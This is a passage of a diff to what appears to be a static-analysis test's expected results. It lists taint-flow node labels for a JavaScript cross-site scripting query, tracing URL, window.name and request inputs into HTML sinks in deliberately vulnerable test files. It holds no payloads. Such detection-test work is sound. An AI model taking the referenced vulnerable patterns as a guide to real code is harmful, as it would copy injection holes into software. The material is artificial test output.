semmle.label | `Time i ... aint)}` | +| dates.js:39:42:39:84 | moment. ... taint) | semmle.label | moment. ... taint) | +| dates.js:39:79:39:83 | taint | semmle.label | taint | +| dates.js:40:31:40:84 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:40:42:40:82 | dayjs.f ... taint) | semmle.label | dayjs.f ... taint) | +| dates.js:40:77:40:81 | taint | semmle.label | taint | +| dates.js:46:9:46:69 | taint | semmle.label | taint | +| dates.js:46:17:46:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | +| dates.js:46:36:46:55 | window.location.hash | semmle.label | window.location.hash | +| dates.js:46:36:46:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | +| dates.js:48:31:48:90 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:48:42:48:88 | DateTim ... (taint) | semmle.label | DateTim ... (taint) | +| dates.js:48:83:48:87 | taint | semmle.label | taint | +| dates.js:49:31:49:89 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:49:42:49:87 | new Dat ... (taint) | semmle.label | new Dat ... (taint) | +| dates.js:49:82:49:86 | taint | semmle.label | taint | +| dates.js:50:31:50:104 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:50:42:50:102 | DateTim ... (taint) | semmle.label | DateTim ... (taint) | +| dates.js:50:97:50:101 | taint | semmle.label | taint | +| dates.js:54:9:54:69 | taint | semmle.label | taint | +| dates.js:54:17:54:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | +| dates.js:54:36:54:55 | window.location.hash | semmle.label | window.location.hash | +| dates.js:54:36:54:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | +| dates.js:57:31:57:101 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:57:42:57:99 | moment. ... (taint) | semmle.label | moment. ... (taint) | +| dates.js:57:94:57:98 | taint | semmle.label | taint | +| dates.js:59:31:59:87 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:59:42:59:85 | luxon.e ... (taint) | semmle.label | luxon.e ... (taint) | +| dates.js:59:80:59:84 | taint | semmle.label | taint | +| dates.js:61:31:61:88 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:61:42:61:86 | dayjs.s ... (taint) | semmle.label | dayjs.s ... (taint) | +| dates.js:61:81:61:85 | taint | semmle.label | taint | +| dragAndDrop.ts:8:11:8:50 | html | semmle.label | html | +| dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | semmle.label | dataTra ... /html') | +| dragAndDrop.ts:15:25:15:28 | html | semmle.label | html | +| dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | semmle.label | e.dataT ... /html') | +| dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | semmle.label | e.dataT ... /html') | +| dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | semmle.label | e.origi ... /html') | +| dragAndDrop.ts:43:15:43:54 | html | semmle.label | html | +| dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | semmle.label | dataTra ... /html') | +| dragAndDrop.ts:50:29:50:32 | html | semmle.label | html | +| dragAndDrop.ts:71:13:71:61 | droppedHtml | semmle.label | droppedHtml | +| dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | semmle.label | e.dataT ... /html') | +| dragAndDrop.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | +| event-handler-receiver.js:2:31:2:83 | '

    ' | semmle.label | '

    ' | +| event-handler-receiver.js:2:49:2:61 | location.href | semmle.label | location.href | +| express.js:6:15:6:33 | req.param("wobble") | semmle.label | req.param("wobble") | +| jquery.js:2:7:2:40 | tainted | semmle.label | tainted | +| jquery.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | +| jquery.js:4:5:4:11 | tainted | semmle.label | tainted | +| jquery.js:5:13:5:19 | tainted | semmle.label | tainted | +| jquery.js:6:11:6:17 | tainted | semmle.label | tainted | +| jquery.js:7:5:7:34 | "
    " | semmle.label | "
    " | +| jquery.js:7:20:7:26 | tainted | semmle.label | tainted | +| jquery.js:8:18:8:34 | "XSS: " + tainted | semmle.label | "XSS: " + tainted | +| jquery.js:8:28:8:34 | tainted | semmle.label | tainted | +| jquery.js:10:5:10:40 | "" + ... "" | semmle.label | "" + ... "" | +| jquery.js:10:13:10:20 | location | semmle.label | location | +| jquery.js:10:13:10:31 | location.toString() | semmle.label | location.toString() | +| jquery.js:14:19:14:58 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | +| jquery.js:14:38:14:57 | window.location.hash | semmle.label | window.location.hash | +| jquery.js:15:19:15:60 | decodeU ... search) | semmle.label | decodeU ... search) | +| jquery.js:15:38:15:59 | window. ... .search | semmle.label | window. ... .search | +| jquery.js:16:19:16:64 | decodeU ... ring()) | semmle.label | decodeU ... ring()) | +| jquery.js:16:38:16:52 | window.location | semmle.label | window.location | +| jquery.js:16:38:16:63 | window. ... tring() | semmle.label | window. ... tring() | +| jquery.js:18:7:18:33 | hash | semmle.label | hash | +| jquery.js:18:14:18:33 | window.location.hash | semmle.label | window.location.hash | +| jquery.js:21:5:21:8 | hash | semmle.label | hash | +| jquery.js:21:5:21:21 | hash.substring(1) | semmle.label | hash.substring(1) | +| jquery.js:22:5:22:8 | hash | semmle.label | hash | +| jquery.js:22:5:22:25 | hash.su ... (1, 10) | semmle.label | hash.su ... (1, 10) | +| jquery.js:23:5:23:8 | hash | semmle.label | hash | +| jquery.js:23:5:23:18 | hash.substr(1) | semmle.label | hash.substr(1) | +| jquery.js:24:5:24:8 | hash | semmle.label | hash | +| jquery.js:24:5:24:17 | hash.slice(1) | semmle.label | hash.slice(1) | +| jquery.js:27:5:27:8 | hash | semmle.label | hash | +| jquery.js:27:5:27:25 | hash.re ... #', '') | semmle.label | hash.re ... #', '') | +| jquery.js:28:5:28:26 | window. ... .search | semmle.label | window. ... .search | +| jquery.js:28:5:28:43 | window. ... ?', '') | semmle.label | window. ... ?', '') | +| jquery.js:34:5:34:25 | '' + ... '' | semmle.label | '' + ... '' | +| jquery.js:34:13:34:16 | hash | semmle.label | hash | +| jquery.js:36:25:36:31 | tainted | semmle.label | tainted | +| jquery.js:37:25:37:37 | () => tainted | semmle.label | () => tainted | +| jquery.js:37:31:37:37 | tainted | semmle.label | tainted | +| json-stringify.jsx:5:9:5:36 | locale | semmle.label | locale | +| json-stringify.jsx:5:18:5:36 | req.param("locale") | semmle.label | req.param("locale") | +| json-stringify.jsx:11:51:11:56 | locale | semmle.label | locale | +| json-stringify.jsx:19:56:19:61 | locale | semmle.label | locale | +| json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | semmle.label | JSON.st ... locale) | +| json-stringify.jsx:31:55:31:60 | locale | semmle.label | locale | +| json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | semmle.label | JSON.st ... jsonLD) | +| jwt-server.js:7:9:7:35 | taint | semmle.label | taint | +| jwt-server.js:7:17:7:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| jwt-server.js:9:16:9:20 | taint | semmle.label | taint | +| jwt-server.js:9:55:9:61 | decoded | semmle.label | decoded | +| jwt-server.js:10:19:10:25 | decoded | semmle.label | decoded | +| jwt-server.js:10:19:10:29 | decoded.foo | semmle.label | decoded.foo | +| nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | semmle.label | `Hi, yo ... sage}.` | +| nodemailer.js:13:50:13:66 | req.query.message | semmle.label | req.query.message | +| optionalSanitizer.js:2:7:2:39 | target | semmle.label | target | +| optionalSanitizer.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | +| optionalSanitizer.js:6:18:6:23 | target | semmle.label | target | +| optionalSanitizer.js:8:7:8:22 | tainted | semmle.label | tainted | +| optionalSanitizer.js:8:17:8:22 | target | semmle.label | target | +| optionalSanitizer.js:9:18:9:24 | tainted | semmle.label | tainted | +| optionalSanitizer.js:15:9:15:14 | target | semmle.label | target | +| optionalSanitizer.js:16:18:16:18 | x | semmle.label | x | +| optionalSanitizer.js:17:20:17:20 | x | semmle.label | x | +| optionalSanitizer.js:26:7:26:39 | target | semmle.label | target | +| optionalSanitizer.js:26:16:26:39 | documen ... .search | semmle.label | documen ... .search | +| optionalSanitizer.js:28:24:28:24 | x | semmle.label | x | +| optionalSanitizer.js:29:12:29:12 | x | semmle.label | x | +| optionalSanitizer.js:31:7:31:23 | tainted2 | semmle.label | tainted2 | +| optionalSanitizer.js:31:18:31:23 | target | semmle.label | target | +| optionalSanitizer.js:32:18:32:25 | tainted2 | semmle.label | tainted2 | +| optionalSanitizer.js:34:5:34:36 | tainted2 | semmle.label | tainted2 | +| optionalSanitizer.js:34:16:34:36 | sanitiz ... inted2) | semmle.label | sanitiz ... inted2) | +| optionalSanitizer.js:34:28:34:35 | tainted2 | semmle.label | tainted2 | +| optionalSanitizer.js:36:18:36:25 | tainted2 | semmle.label | tainted2 | +| optionalSanitizer.js:38:7:38:23 | tainted3 | semmle.label | tainted3 | +| optionalSanitizer.js:38:18:38:23 | target | semmle.label | target | +| optionalSanitizer.js:39:18:39:25 | tainted3 | semmle.label | tainted3 | +| optionalSanitizer.js:41:5:41:36 | tainted3 | semmle.label | tainted3 | +| optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | semmle.label | sanitiz ... inted3) | +| optionalSanitizer.js:41:28:41:35 | tainted3 | semmle.label | tainted3 | +| optionalSanitizer.js:43:18:43:25 | tainted3 | semmle.label | tainted3 | +| optionalSanitizer.js:45:18:45:56 | sanitiz ... target | semmle.label | sanitiz ... target | +| optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | semmle.label | sanitizeBad(target) | +| optionalSanitizer.js:45:41:45:46 | target | semmle.label | target | +| optionalSanitizer.js:45:51:45:56 | target | semmle.label | target | +| pages/[id].jsx:3:30:3:35 | params [id] | semmle.label | params [id] | +| pages/[id].jsx:3:30:3:35 | params [q] | semmle.label | params [q] | +| pages/[id].jsx:5:9:5:14 | { id } | semmle.label | { id } | +| pages/[id].jsx:5:9:5:29 | id | semmle.label | id | +| pages/[id].jsx:5:18:5:29 | router.query | semmle.label | router.query | +| pages/[id].jsx:10:44:10:45 | id | semmle.label | id | +| pages/[id].jsx:13:44:13:49 | params [id] | semmle.label | params [id] | +| pages/[id].jsx:13:44:13:52 | params.id | semmle.label | params.id | +| pages/[id].jsx:16:44:16:49 | params [q] | semmle.label | params [q] | +| pages/[id].jsx:16:44:16:51 | params.q | semmle.label | params.q | +| pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [id] | semmle.label | {\\n ... e\\n } [id] | +| pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [q] | semmle.label | {\\n ... e\\n } [q] | +| pages/[id].jsx:25:11:25:24 | context.params | semmle.label | context.params | +| pages/[id].jsx:25:11:25:33 | context ... d \|\| "" | semmle.label | context ... d \|\| "" | +| pages/[id].jsx:26:10:26:22 | context.query | semmle.label | context.query | +| pages/[id].jsx:26:10:26:36 | context ... r \|\| "" | semmle.label | context ... r \|\| "" | +| react-native.js:7:7:7:33 | tainted | semmle.label | tainted | +| react-native.js:7:17:7:33 | req.param("code") | semmle.label | req.param("code") | +| react-native.js:8:18:8:24 | tainted | semmle.label | tainted | +| react-native.js:9:27:9:33 | tainted | semmle.label | tainted | +| react-use-context.js:10:22:10:32 | window.name | semmle.label | window.name | +| react-use-context.js:16:26:16:36 | window.name | semmle.label | window.name | +| react-use-router.js:8:21:8:32 | router.query | semmle.label | router.query | +| react-use-router.js:8:21:8:39 | router.query.foobar | semmle.label | router.query.foobar | +| react-use-router.js:11:24:11:35 | router.query | semmle.label | router.query | +| react-use-router.js:11:24:11:42 | router.query.foobar | semmle.label | router.query.foobar | +| react-use-router.js:23:43:23:54 | router.query | semmle.label | router.query | +| react-use-router.js:23:43:23:61 | router.query.foobar | semmle.label | router.query.foobar | +| react-use-router.js:33:21:33:32 | router.query | semmle.label | router.query | +| react-use-router.js:33:21:33:39 | router.query.foobar | semmle.label | router.query.foobar | +| react-use-state.js:4:9:4:49 | state | semmle.label | state | +| react-use-state.js:4:38:4:48 | window.name | semmle.label | window.name | +| react-use-state.js:5:51:5:55 | state | semmle.label | state | +| react-use-state.js:9:9:9:43 | state | semmle.label | state | +| react-use-state.js:10:14:10:24 | window.name | semmle.label | window.name | +| react-use-state.js:11:51:11:55 | state | semmle.label | state | +| react-use-state.js:15:9:15:43 | state | semmle.label | state | +| react-use-state.js:15:10:15:14 | state | semmle.label | state | +| react-use-state.js:16:20:16:30 | window.name | semmle.label | window.name | +| react-use-state.js:17:51:17:55 | state | semmle.label | state | +| react-use-state.js:21:10:21:14 | state | semmle.label | state | +| react-use-state.js:22:14:22:17 | prev | semmle.label | prev | +| react-use-state.js:23:35:23:38 | prev | semmle.label | prev | +| react-use-state.js:25:20:25:30 | window.name | semmle.label | window.name | +| sanitiser.js:16:7:16:27 | tainted | semmle.label | tainted | +| sanitiser.js:16:17:16:27 | window.name | semmle.label | window.name | +| sanitiser.js:23:21:23:44 | '' + ... '' | semmle.label | '' + ... '' | +| sanitiser.js:23:29:23:35 | tainted | semmle.label | tainted | +| sanitiser.js:30:21:30:44 | '' + ... '' | semmle.label | '' + ... '' | +| sanitiser.js:30:29:30:35 | tainted | semmle.label | tainted | +| sanitiser.js:33:21:33:44 | '' + ... '' | semmle.label | '' + ... '' | +| sanitiser.js:33:29:33:35 | tainted | semmle.label | tainted | +| sanitiser.js:38:21:38:44 | '' + ... '' | semmle.label | '' + ... '' | +| sanitiser.js:38:29:38:35 | tainted | semmle.label | tainted | +| sanitiser.js:45:21:45:44 | '' + ... '' | semmle.label | '' + ... '' | +| sanitiser.js:45:29:45:35 | tainted | semmle.label | tainted | +| sanitiser.js:48:19:48:25 | tainted | semmle.label | tainted | +| sanitiser.js:48:19:48:46 | tainted ... /g, '') | semmle.label | tainted ... /g, '') | +| stored-xss.js:2:39:2:62 | documen ... .search | semmle.label | documen ... .search | +| stored-xss.js:3:35:3:58 | documen ... .search | semmle.label | documen ... .search | +| stored-xss.js:5:20:5:52 | session ... ssion') | semmle.label | session ... ssion') | +| stored-xss.js:8:20:8:48 | localSt ... local') | semmle.label | localSt ... local') | +| stored-xss.js:10:9:10:44 | href | semmle.label | href | +| stored-xss.js:10:16:10:44 | localSt ... local') | semmle.label | localSt ... local') | +| stored-xss.js:12:20:12:54 | "" | semmle.label | "" | +| stored-xss.js:12:35:12:38 | href | semmle.label | href | +| string-manipulations.js:3:16:3:32 | document.location | semmle.label | document.location | +| string-manipulations.js:4:16:4:37 | documen ... on.href | semmle.label | documen ... on.href | +| string-manipulations.js:5:16:5:37 | documen ... on.href | semmle.label | documen ... on.href | +| string-manipulations.js:5:16:5:47 | documen ... lueOf() | semmle.label | documen ... lueOf() | +| string-manipulations.js:6:16:6:37 | documen ... on.href | semmle.label | documen ... on.href | +| string-manipulations.js:6:16:6:43 | documen ... f.sup() | semmle.label | documen ... f.sup() | +| string-manipulations.js:7:16:7:37 | documen ... on.href | semmle.label | documen ... on.href | +| string-manipulations.js:7:16:7:51 | documen ... rCase() | semmle.label | documen ... rCase() | +| string-manipulations.js:8:16:8:37 | documen ... on.href | semmle.label | documen ... on.href | +| string-manipulations.js:8:16:8:48 | documen ... mLeft() | semmle.label | documen ... mLeft() | +| string-manipulations.js:9:16:9:58 | String. ... n.href) | semmle.label | String. ... n.href) | +| string-manipulations.js:9:36:9:57 | documen ... on.href | semmle.label | documen ... on.href | +| string-manipulations.js:10:16:10:45 | String( ... n.href) | semmle.label | String( ... n.href) | +| string-manipulations.js:10:23:10:44 | documen ... on.href | semmle.label | documen ... on.href | +| tainted-url-suffix-arguments.js:3:17:3:17 | y | semmle.label | y | +| tainted-url-suffix-arguments.js:6:22:6:22 | y | semmle.label | y | +| tainted-url-suffix-arguments.js:11:11:11:36 | url | semmle.label | url | +| tainted-url-suffix-arguments.js:11:17:11:36 | window.location.href | semmle.label | window.location.href | +| tainted-url-suffix-arguments.js:12:17:12:19 | url | semmle.label | url | +| tooltip.jsx:6:11:6:30 | source | semmle.label | source | +| tooltip.jsx:6:20:6:30 | window.name | semmle.label | window.name | +| tooltip.jsx:10:25:10:30 | source | semmle.label | source | +| tooltip.jsx:11:25:11:30 | source | semmle.label | source | +| tooltip.jsx:17:11:17:33 | provide [source] | semmle.label | provide [source] | +| tooltip.jsx:17:21:17:33 | props.provide [source] | semmle.label | props.provide [source] | +| tooltip.jsx:18:51:18:57 | provide [source] | semmle.label | provide [source] | +| tooltip.jsx:18:51:18:59 | provide() | semmle.label | provide() | +| tooltip.jsx:22:11:22:30 | source | semmle.label | source | +| tooltip.jsx:22:20:22:30 | window.name | semmle.label | window.name | +| tooltip.jsx:23:38:23:43 | source | semmle.label | source | +| translate.js:6:7:6:39 | target | semmle.label | target | +| translate.js:6:16:6:39 | documen ... .search | semmle.label | documen ... .search | +| translate.js:7:7:7:61 | searchParams | semmle.label | searchParams | +| translate.js:7:7:7:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| translate.js:7:22:7:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | +| translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | +| translate.js:7:42:7:47 | target | semmle.label | target | +| translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | +| translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | +| translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | +| translate.js:8:27:8:38 | searchParams | semmle.label | searchParams | +| translate.js:8:27:8:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| translate.js:8:27:8:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | +| trusted-types-lib.js:1:28:1:28 | x | semmle.label | x | +| trusted-types-lib.js:2:12:2:12 | x | semmle.label | x | +| trusted-types.js:3:62:3:62 | x | semmle.label | x | +| trusted-types.js:3:67:3:67 | x | semmle.label | x | +| trusted-types.js:4:20:4:30 | window.name | semmle.label | window.name | +| trusted-types.js:13:20:13:30 | window.name | semmle.label | window.name | +| tst3.js:2:12:2:75 | JSON.pa ... tr(1))) | semmle.label | JSON.pa ... tr(1))) | +| tst3.js:2:23:2:74 | decodeU ... str(1)) | semmle.label | decodeU ... str(1)) | +| tst3.js:2:42:2:63 | window. ... .search | semmle.label | window. ... .search | +| tst3.js:2:42:2:73 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | +| tst3.js:4:25:4:28 | data | semmle.label | data | +| tst3.js:4:25:4:32 | data.src | semmle.label | data.src | +| tst3.js:5:26:5:29 | data | semmle.label | data | +| tst3.js:5:26:5:31 | data.p | semmle.label | data.p | +| tst3.js:7:32:7:35 | data | semmle.label | data | +| tst3.js:7:32:7:37 | data.p | semmle.label | data.p | +| tst3.js:9:37:9:40 | data | semmle.label | data | +| tst3.js:9:37:9:42 | data.p | semmle.label | data.p | +| tst3.js:10:38:10:41 | data | semmle.label | data | +| tst3.js:10:38:10:43 | data.p | semmle.label | data.p | +| tst.js:2:7:2:39 | target | semmle.label | target | +| tst.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:4:18:4:23 | target | semmle.label | target | +| tst.js:6:18:6:126 | "" | semmle.label | "" | +| tst.js:6:37:6:58 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:9:5:9:42 | '
    ' | semmle.label | '
    ' | +| tst.js:9:28:9:33 | target | semmle.label | target | +| tst.js:14:7:14:56 | params | semmle.label | params | +| tst.js:14:7:14:56 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | +| tst.js:14:16:14:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:14:25:14:41 | document.location | semmle.label | document.location | +| tst.js:15:18:15:23 | params | semmle.label | params | +| tst.js:15:18:15:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:15:18:15:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:17:7:17:61 | searchParams | semmle.label | searchParams | +| tst.js:17:7:17:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:17:22:17:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | +| tst.js:17:42:17:47 | target | semmle.label | target | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:18:18:18:29 | searchParams | semmle.label | searchParams | +| tst.js:18:18:18:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:18:18:18:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | +| tst.js:21:14:21:19 | target | semmle.label | target | +| tst.js:22:18:22:23 | target | semmle.label | target | +| tst.js:24:5:24:28 | documen ... .search | semmle.label | documen ... .search | +| tst.js:27:10:27:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:29:16:29:20 | bar() | semmle.label | bar() | +| tst.js:31:14:31:14 | x | semmle.label | x | +| tst.js:32:10:32:10 | x | semmle.label | x | +| tst.js:34:16:34:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | +| tst.js:34:20:34:43 | documen ... .search | semmle.label | documen ... .search | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:37:10:37:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:39:16:39:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:39:21:39:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:41:15:41:15 | s | semmle.label | s | +| tst.js:43:12:43:12 | s | semmle.label | s | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:46:16:46:45 | chop(do ... search) | semmle.label | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:47:16:47:45 | chop(do ... search) | semmle.label | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:48:16:48:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:26:48:30 | bar() | semmle.label | bar() | +| tst.js:50:34:50:34 | s | semmle.label | s | +| tst.js:51:18:51:18 | s | semmle.label | s | +| tst.js:53:25:53:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:54:25:54:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:56:16:56:20 | bar() | semmle.label | bar() | +| tst.js:58:1:58:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | +| tst.js:58:3:58:26 | documen ... .search | semmle.label | documen ... .search | +| tst.js:58:46:58:46 | x | semmle.label | x | +| tst.js:60:20:60:20 | x | semmle.label | x | +| tst.js:63:49:63:72 | documen ... .search | semmle.label | documen ... .search | +| tst.js:67:26:67:49 | documen ... .search | semmle.label | documen ... .search | +| tst.js:68:25:68:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:70:33:70:56 | documen ... .search | semmle.label | documen ... .search | +| tst.js:71:32:71:55 | documen ... .search | semmle.label | documen ... .search | +| tst.js:76:39:76:62 | documen ... .search | semmle.label | documen ... .search | +| tst.js:82:30:82:53 | documen ... .search | semmle.label | documen ... .search | +| tst.js:88:25:88:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:7:93:44 | v | semmle.label | v | +| tst.js:93:11:93:34 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:11:93:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:95:18:95:18 | v | semmle.label | v | +| tst.js:120:18:120:18 | v | semmle.label | v | +| tst.js:132:29:132:50 | window. ... .search | semmle.label | window. ... .search | +| tst.js:135:29:135:29 | v | semmle.label | v | +| tst.js:135:49:135:49 | v | semmle.label | v | +| tst.js:139:29:139:46 | xssSourceService() | semmle.label | xssSourceService() | +| tst.js:142:40:142:61 | window. ... .search | semmle.label | window. ... .search | +| tst.js:161:9:161:41 | target | semmle.label | target | +| tst.js:161:18:161:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:164:28:164:33 | target | semmle.label | target | +| tst.js:168:9:168:42 | tainted | semmle.label | tainted | +| tst.js:168:19:168:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:170:31:170:37 | tainted | semmle.label | tainted | +| tst.js:172:42:172:48 | tainted | semmle.label | tainted | +| tst.js:173:33:173:39 | tainted | semmle.label | tainted | +| tst.js:175:54:175:60 | tainted | semmle.label | tainted | +| tst.js:176:45:176:51 | tainted | semmle.label | tainted | +| tst.js:177:49:177:55 | tainted | semmle.label | tainted | +| tst.js:181:9:181:42 | tainted | semmle.label | tainted | +| tst.js:181:19:181:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:183:67:183:73 | tainted | semmle.label | tainted | +| tst.js:184:67:184:73 | tainted | semmle.label | tainted | +| tst.js:188:35:188:41 | tainted | semmle.label | tainted | +| tst.js:190:46:190:52 | tainted | semmle.label | tainted | +| tst.js:191:38:191:44 | tainted | semmle.label | tainted | +| tst.js:192:35:192:41 | tainted | semmle.label | tainted | +| tst.js:196:28:196:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | +| tst.js:197:28:197:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | +| tst.js:198:28:198:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | +| tst.js:202:32:202:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | +| tst.js:209:28:209:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | +| tst.js:210:28:210:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | +| tst.js:211:28:211:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | +| tst.js:215:32:215:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | +| tst.js:220:35:220:41 | tainted | semmle.label | tainted | +| tst.js:222:20:222:26 | tainted | semmle.label | tainted | +| tst.js:224:23:224:29 | tainted | semmle.label | tainted | +| tst.js:225:23:225:29 | tainted | semmle.label | tainted | +| tst.js:231:39:231:55 | props.propTainted | semmle.label | props.propTainted | +| tst.js:235:60:235:82 | this.st ... Tainted | semmle.label | this.st ... Tainted | +| tst.js:239:23:239:29 | tainted | semmle.label | tainted | +| tst.js:243:7:243:17 | window.name | semmle.label | window.name | +| tst.js:244:7:244:10 | name | semmle.label | name | +| tst.js:248:11:248:21 | window.name | semmle.label | window.name | +| tst.js:264:22:264:29 | location | semmle.label | location | +| tst.js:269:9:269:29 | tainted | semmle.label | tainted | +| tst.js:269:19:269:29 | window.name | semmle.label | window.name | +| tst.js:272:59:272:65 | tainted | semmle.label | tainted | +| tst.js:285:9:285:16 | location | semmle.label | location | +| tst.js:286:10:286:10 | e | semmle.label | e | +| tst.js:287:20:287:20 | e | semmle.label | e | +| tst.js:292:10:292:17 | location | semmle.label | location | +| tst.js:294:10:294:10 | e | semmle.label | e | +| tst.js:295:20:295:20 | e | semmle.label | e | +| tst.js:300:35:300:42 | location | semmle.label | location | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:311:18:311:34 | document.location | semmle.label | document.location | +| tst.js:315:7:315:43 | params | semmle.label | params | +| tst.js:315:7:315:43 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | +| tst.js:315:16:315:43 | getTain ... hParams | semmle.label | getTain ... hParams | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... hParams [MapValue] | +| tst.js:316:18:316:23 | params | semmle.label | params | +| tst.js:316:18:316:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:316:18:316:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | +| tst.js:325:20:325:36 | document.location | semmle.label | document.location | +| tst.js:327:5:327:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | +| tst.js:327:5:327:17 | getUrl().hash | semmle.label | getUrl().hash | +| tst.js:327:5:327:30 | getUrl( ... 